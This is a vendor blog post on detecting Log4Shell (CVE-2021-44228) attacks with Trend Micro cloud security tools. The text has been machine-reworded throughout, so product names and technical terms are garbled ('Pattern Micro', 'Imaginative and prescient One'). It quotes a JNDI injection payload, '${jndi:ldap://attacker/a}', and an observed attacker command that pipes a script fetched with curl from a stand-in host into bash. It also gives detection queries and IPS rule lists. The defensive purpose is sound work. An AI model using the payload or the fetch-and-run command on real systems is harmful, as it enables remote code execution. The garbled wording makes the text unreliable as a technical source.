[ad_1]
The way to Detect Apache Log4j Vulnerabilities
Community Safety
Discover the best way to detect Apache Log4j (Log4Shell) vulnerabilities utilizing cloud-native safety instruments.
By: Nitesh Surana
January 27, 2022
Learn time: ( phrases)
In my earlier weblog, I reviewed the best way to detect Apache HTTP server exploitation from vulnerabilities in October. Weirdly sufficient, I wrote that article earlier than the Apache Log4j (Log4Shell) information broke in December 2021. So I’m again to put in writing about the best way to detect the notorious Log4j vulnerability (CVE-2021-44228) that enables attackers to attain distant code execution on the sufferer servers utilizing the weak variations of the favored library in uncovered internet functions/companies.
Phases of Log4j assault
Earlier than diving straight into detection/prevention, let’s first check out the completely different phases of the assault. For majority of the assaults whereby Log4j is exploited, the circulate seems like this:
Supply: Pattern Micro
The above depicts a weak public dealing with internet service that logs the Person-Agent discipline from the HTTP request. Right here’s how the assault works:
The malicious Java Naming Listing Interface (JDNI) payload can arrive in any protocol; it simply wants to achieve the weak Log4j logging mechanism. On this case, the protocol is HTTP and the payload is shipped within the ‘Person-Agent’ header.
The worth of Person-Agent header is logged by a weak internet software utilizing the Log4j library. Logging of fields like these is frequent in Java-based functions.
The payload ${jndi:ldap://attacker/a} is appeared up utilizing JNDI, which in flip tries accessing the LDAP server.
If distant loading of Java lessons is enabled (i.e., if com.solar.jndi.ldap.object.trustURLCodebase is about to true), the attacker’s infrastructure is named to utilizing a set of protocols (LDAP on this case).
The LDAP response can comprise both of the 2:
The response itself would possibly comprise the malicious Java bytecode
The response accommodates a reference to the attacker’s infrastructure from the place the malicious Java class file is fetched.
On this case, the Java class file is fetched as follows:
The malicious bytecode is executed, which in flip results in malicious command and management in step 7.
Malicious command and management is noticed between attacker’s infrastructure and the weak server
Detection of Log4j
Now that we’ve got a good understanding of what the vulnerability is and the way it seems, let’s discover the best way to detect Log4j assaults utilizing Pattern Micro Cloud One™ and Pattern Micro Imaginative and prescient One™.
As I discussed within the final weblog, Pattern Micro Cloud One is a safety companies platform for cloud builders composed of seven companies. It’s built-in with Pattern Micro Imaginative and prescient One, which leverages industry-leading XDR capabilities to gather, correlate, and show information from Pattern Micro Cloud One in a simple dashboard.
On this situation, we used Pattern Micro Cloud One™ – Community Safety and Pattern Micro Cloud One™ – Workload Safety detect Log4j vulnerabilities. Community Safety goes past conventional intrusion prevention techniques (IPS) to examine ingress and egress visitors, including one other layer of safety between the weak Log4j library. Concurrently, Workload Safety ensures your containers and datacenters are secured with automated scanning and customazible post-scan actions.
Let’s dissect how Workload Safety works:
Right here we see how the completely different Workload Safety modules work in tandem, capturing the overview of various phases of a profitable exploit try.
The next is a listing of IPS guidelines for detecting Log4j:
1011242 – Apache Log4j Distant Code Execution Vulnerability (CVE-2021-44228 and CVE-2021-45046)
1011249 – Apache Log4j Denial of Service Vulnerability (CVE-2021-45105)
1005177 – Limit Java Bytecode File (Jar/Class) Obtain
Right here’s how the foundations work to detect the assault at completely different phases:
IPS rule 1011242 – Apache Log4j Distant Code Execution Vulnerability (CVE-2021-44228) detects stage one of many assault, whereby JNDI payload is injected within the request physique/header/URI/uriquery.
IPS rule 1011249 – Apache Log4j Denial of Service Vulnerability (CVE-2021-45105) detects visitors with the Denial Of Service JNDI payload within the request physique/header/URI/uriquery.
IPS rule 1005177 – Limit Java Bytecode File (Jar/Class) Obtain triggers when a shopper downloads a .class or .jar file, which executes attacker-controlled, malicious code on a goal.
We additionally use a log inspection rule to detect the vulnerability.
The log inspection rule 1011241 – Apache Log4j Distant Code Execution Vulnerability (CVE-2021-44228) seems for JNDI payloads within the entry logs, with the default path being /var/log/*/entry.log.
Totally different log sources from different functions might be configured to examine logs by including log information utilizing their absolute paths within the Configuration tab.
Now that we’ve lined Workload Safety detections, let’s evaluation Community Safety helps detect and stop exploitation of Log4j vulnerabilities utilizing the next IPS filters:
40652: HTTP: Apache Log4j StrSubstitutor Denial-of-Service Vulnerability (ZDI-21-1541) detects an try to take advantage of a denial-of-service vulnerability in Apache Log4j. The particular flaw exists as a consequence of a failure to correctly sanitize values being logged. Profitable exploitation leads to a denial-of-service situation.
40651: HTTP: JNDI Recursive Variable Substitute in an HTTP Request detects the utilization of a recursive variable substitute inside a JNDI expression in an HTTP request. Whereas not inherently malicious, visitors of this nature can be utilized to create a denial-of-service situation in some weak configurations of Log4j or be used to bypass detection of different jndi vulnerabilities.
40627: HTTP: JNDI Injection in HTTP Request detects an try and inject JNDI requests in HTTP request. Whereas not inherently malicious, the presence of JNDI code within the HTTP requests might be indicative of an try to take advantage of a recognized code execution vulnerability in Log4j.
13876: TCP: Obtain/Add of a Java .class Utility detect an try and obtain or add a .class Java file. Oracle Java is an object oriented programming language used throughout an enormous quantity of gadgets and home equipment. Based mostly on the anticipated frequent prevalence of matches on this filter’s logic, it shouldn’t be deployed inline with a blocking motion set till absolutely efficiency examined and vetted for false positives in its goal manufacturing atmosphere. This can be a coverage filter which, when enabled in sure deployments, could also be vulnerable to false constructive circumstances in addition to attainable efficiency impacts. If Oracle Java just isn’t deployed or anticipated for deployment in your community, this filter shouldn’t be enabled in blocking mode.
40640: LDAP: Generic BIND Request (Non-Customary Ports) detects an LDAP BIND request on non-standard ports.
40646: LDAP: Generic BIND Request (Customary Ports) filter detects an LDAP BIND request on customary ports.
Tying all of it along with Pattern Micro Imaginative and prescient One
Noticed assault methods from Pattern Micro Imaginative and prescient One
We’ve seen how Community Safety and Workload Safety can detect Log4j vulnerabilities, however what good is that data by itself? Pattern Micro Imaginative and prescient One places collectively the puzzle so you may have complete visibility throughout all information in a single console. Let’s dive into what you may see (pun supposed) with Pattern Micro Imaginative and prescient One:
Noticed assault methods (OATs)
These are particular person alerts that point out unit steps of excessive significance (for instance, IPS set off for Log4j distant code execution (RCE) vulnerability or log Inspection set off for Log4j JNDI Payload in entry logs).
Pattern Micro Imaginative and prescient One Menace Searching app helps you see if something suspicious or alarming taking place throughout endpoints. On this instance, the next OATs should be investigated to slender down on the whereabouts of a attainable intrusion:
F4778 – Apache Log4j Distant Code Execution Vulnerability (CVE-2021-44228)F4779 – Log4j Distant Code Execution Vulnerability (CVE-2021-44228)F4780 – Limit Java Bytecode File (Jar or Class) DownloadF4783 – Susceptible LOG4J Model for CVE-2021-44228F4801 – Apache Log4j Denial of Service VulnerabilityF4795 – Apache Log4j Distant Code Execution
Search App Queries
The Search app helps discover malicious JNDI payloads from completely different module detections from Workload Safety throughout all endpoints leveraging Pattern Micro Imaginative and prescient One. Under are examples of searches I made primarily based on my understanding of the vulnerability and the place seen occasions present up:
Utilizing Search Technique: Endpoint Exercise Information, search for a mother or father course of with java within the file path making a curl or wget course of. Within the majority of assaults noticed, curl and wget have been used to obtain and run malicious scripts and executables on weak servers.
Search: (processCmd:curl OR processCmd:wget) AND parentFilePath:*java*
JNDI payload patterns in msg discipline of Workload Safety prevention triggers.Search: eventName:DEEP_PACKET_INSPECTION_EVENT AND (ruleId:1008610 OR ruleId:1011242 OR ruleId:1011249) AND (“${” AND (“decrease:” OR “higher:” OR “sys:” OR “env:” OR “java:” OR “jndi:”))
JNDI payload patterns in remarks discipline of Workload Safety log Inspection triggers –Search: eventName:LOG_INSPECTION_EVENT AND (“${” AND (“decrease:” OR “higher:” OR “sys:” OR “env:” OR “java:” OR “jndi:”))
Root-cause evaluation (RCA)
Utilizing Pattern Micro Imaginative and prescient One, we will use the Execution Profile to carry out a deeper RCA, serving to analysts perceive the chain of occasions of the assaults that try to take advantage of Log4j.
Within the assaults we noticed, the Log4j vulnerability is exploited to obtain malicious shell scripts on the goal machine utilizing curl or wget and execute them by piping them to bash or sh: curl maliciousIp/maliciousScript | bash.
The RCA above explains the outbound connections to attacker managed IP handle and the creation of Executable and Linkable Format (ELF) binaries. The ELFs downloaded are made executable through the use of the chmod utility.
On this RCA, we see execution of shell instructions like clear, id, and whoami, that are being executed the place systemd-shell is the mother or father course of. As we will see, they stem from the bash shell and the command line is logged by the Exercise Monitoring module.
Workbench
The Pattern Micro Imaginative and prescient One Workbench helps you visualize and take motion on probably the most important occasions noticed in an atmosphere. These detections embody telemetry from varied Pattern Micro merchandise (on this case, Pattern Micro Cloud One companies) and the Workbench condenses them right into a single pane of glass view.
Right here we see Bash Shell Script Execution is noticed proper after the IPS set off for Log4j. The Influence Scope shows the variety of hosts/servers noticed for correlation exercise to the alert. The highlighted fields (processCmd, processFilePath) on the left are what’s being monitored throughout different deployments and workloads all through the group.
On this set off, we see the outbound community exercise to a recognized cryptocurrency mining pool after the Log4j vulnerability is exploited. Attackers have been exploiting the vulnerability to ship cryptocurrency coinminers and MIRAI botnet malware. The Command and Management (C&C) noticed is logged by the Net Status Service and Exercise Monitoring.
On this Workbench set off, the occasion is from the Log Inspection module, whereby the JNDI payload was noticed within the entry logs of an online server.
Subsequent steps
Hold updated on growing Log4Shell information right here. You may also begin a free trial or take a look at our intensive documentation library to see how Pattern Micro Imaginative and prescient One powers layered detection and response for our cloud-builder safety platform, Pattern Micro Cloud One.
Tags
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
[ad_2]